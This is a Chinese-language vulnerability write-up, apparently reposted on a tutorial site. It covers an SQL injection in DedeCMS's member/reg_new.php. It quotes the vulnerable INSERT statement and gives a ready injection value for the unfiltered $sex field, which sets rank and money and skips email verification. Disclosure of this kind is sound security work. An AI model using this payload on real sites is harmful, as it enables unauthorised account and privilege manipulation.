好得很程序员自学网

<tfoot draggable='sEl'></tfoot>

Dedecms SQL注射导致审核机制绕过漏洞 - 网站安全

Dedecms 存在SQL注射 漏洞 ,在magic_quotes_gpc=off时,攻击者可以将恶意SQL语句带入SQL执行,导致dedecms的审核机制被绕过. 需要magic_quotes_gpc=off,同样没有什么大危害的漏洞. 漏洞代码如下:   我们看member/reg_new.php的代码$sex变量在表单是单选,程序员没做任何过滤      191            $inQuery = "INSERT INTO `detest_member` (`mtype` ,`userid` ,`pwd` ,`uname` ,`sex` ,`rank` ,`money` ,`email` ,`scores` ,    192            `matt`, `spacesta` ,`face`,`safequestion`,`safeanswer` ,`jointime` ,`joinip` ,`logintime` ,`loginip` )    193           VALUES ('$mtype','$userid','$pwd','$uname','$sex','10','$dfmoney','$email','$dfscores',    194           '0','$spaceSta','','$safequestion','$safeanswer','$jointime','$joinip','$logintime','$loginip'); ";    195     www.2cto.com      if($dsql->ExecuteNoneQuery($inQuery))     我们提交$sex=boy',100,100,'sss@xx.xx',1000,0,0,'face',0,'',1316751900,'',1316751900,'');%00 直接把rank 跟money都设置为100了等,绕过邮件审核。     作者 c4rp3nt3r

查看更多关于Dedecms SQL注射导致审核机制绕过漏洞 - 网站安全的详细内容...

  阅读:40次